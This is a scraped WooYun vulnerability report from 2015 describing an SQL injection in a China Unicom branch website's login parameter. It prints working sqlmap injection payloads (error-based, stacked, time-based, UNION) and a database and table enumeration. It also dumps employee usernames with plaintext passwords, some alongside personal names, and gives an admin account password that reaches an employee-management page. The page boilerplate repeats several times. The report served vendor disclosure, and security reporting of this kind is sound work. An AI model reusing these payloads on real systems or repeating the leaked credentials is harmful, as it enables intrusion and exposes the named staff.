运营商安全之联通某处处都是bug的分站SQL注入涉及大量个人信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153849

漏洞标题：运营商安全之联通某处处都是bug的分站SQL注入涉及大量个人信息

漏洞作者：李旭敏

提交时间：2015-11-18 11:29

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-18：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经确认，细节仅向厂商公开
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

bug比漏洞还多

详细说明：

注入点：

**.**.**.**/sqjl_loginchk.html?un=CasterJs&pw=CasterJs&number=0.6992921326309443

大量员工工号密码都出来了，还有其他运营部门的一些管理账号。

Database: daohang
Table: cmzy_user
[11 entries]
+--------------+--------------+
| cmzy_user_un | cmzy_user_pw |
+--------------+--------------+
| M114         | banbanMM13   |
| admin114     | eip12345     |
| xiaoliuvv    | xiaoliuvvv   |

Database: daohang
Table: dj114user
[4 entries]
+----------------+--------------------+--------------------+
| dj114user_name | dj114user_username | dj114user_password |
+----------------+--------------------+--------------------+
| 冯志勋            | fengzhixun         | 111                |
| 林梅             | linmei             | 111                |
| 张淑洁            | zhangshujie        | 111                |
| 赵丽丽            | zhaolili           | 111                |
+----------------+--------------------+--------------------+

拿到某管理账号，目测是销售经理的，账号admin，密码zl840611
登陆地址：**.**.**.**/sqjl.html
这里登陆有问题，不会主动跳转，根据注入漏洞表段名字（sqjl_ry），我尝试访问了
**.**.**.**/sqjl_ry.html

可以操作659名分公司员工以及管理的账号，并且可以初始化账号密码，初始化这里也有问题，只能通过抓包拿到返回结果，不会回显

不知道这个功能是否能对普通用户使用，我就不多做测试了。

漏洞证明：

Parameter: un (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: un=CasterJs' AND 1676=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1676=1676) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(120)+CHAR(113))) AND 'xvDx'='xvDx&pw=CasterJs&number=0.6992921326309443
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: un=CasterJs';WAITFOR DELAY '0:0:5'--&pw=CasterJs&number=0.6992921326309443
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: un=CasterJs' WAITFOR DELAY '0:0:5'--&pw=CasterJs&number=0.6992921326309443
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: un=CasterJs' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(117)+CHAR(97)+CHAR(102)+CHAR(82)+CHAR(70)+CHAR(117)+CHAR(113)+CHAR(79)+CHAR(76)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pw=CasterJs&number=0.6992921326309443
---
[11:43:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[11:43:55] [INFO] fetching database names
[11:43:55] [INFO] the SQL query used returns 5 entries
[11:43:55] [INFO] resumed: daohang
[11:43:55] [INFO] resumed: master
[11:43:55] [INFO] resumed: model
[11:43:55] [INFO] resumed: msdb
[11:43:55] [INFO] resumed: tempdb
available databases [5]:
[*] daohang
[*] master
[*] model
[*] msdb
[*] tempdb

Database: daohang
[44 tables]
+-------------------+
| Sheet1            |
| baixing           |
| choujiang_jl      |
| choujiang_lb      |
| choujiangfw_log   |
| cmzy_atdg_dingdan |
| cmzy_atdg_ydlist  |
| cmzy_atdg_zy      |
| cmzy_spmt_dingdan |
| cmzy_spmt_ydlist  |
| cmzy_spmt_zydw    |
| cmzy_spmt_zydw    |
| cmzy_spmt_zyzt    |
| cmzy_user         |
| dj114             |
| dj114user         |
| dtproperties      |
| fw_log            |
| ly                |
| mtzy_dw           |
| mtzy_fw           |
| mtzy_hy           |
| mtzy_user         |
| mtzy_xzq          |
| mtzy_ydlist       |
| mtzy_ydlist       |
| mtzy_zyzt         |
| qcfw_wx           |
| qcfw_wx           |
| qcfw_xc           |
| qcfw_yp           |
| sqjl_bm           |
| sqjl_cp           |
| sqjl_fzkt         |
| sqjl_fzkt         |
| sqjl_fzlog        |
| sqjl_ry           |
| sqsc_cq           |
| sqsc_list         |
| v_mtzy_dw         |
| v_mtzy_fw         |
| v_mtzy_ydlist     |
| v_sqjl_fz         |
| yj2013            |
+-------------------+

修复方案：

版权声明：转载请注明来源李旭敏@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-11-24 14:24

厂商回复：

CNVD未复现所述情况，暂未列入处置流程。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153849

漏洞标题：运营商安全之联通某处处都是bug的分站SQL注入涉及大量个人信息

相关厂商：中国联通

漏洞作者：李旭敏

提交时间：2015-11-18 11:29

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源李旭敏@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153849

漏洞标题：运营商安全之联通某处处都是bug的分站SQL注入涉及大量个人信息

相关厂商：中国联通

漏洞作者： 李旭敏

提交时间：2015-11-18 11:29

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153849"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 李旭敏@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：李旭敏

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源李旭敏@乌云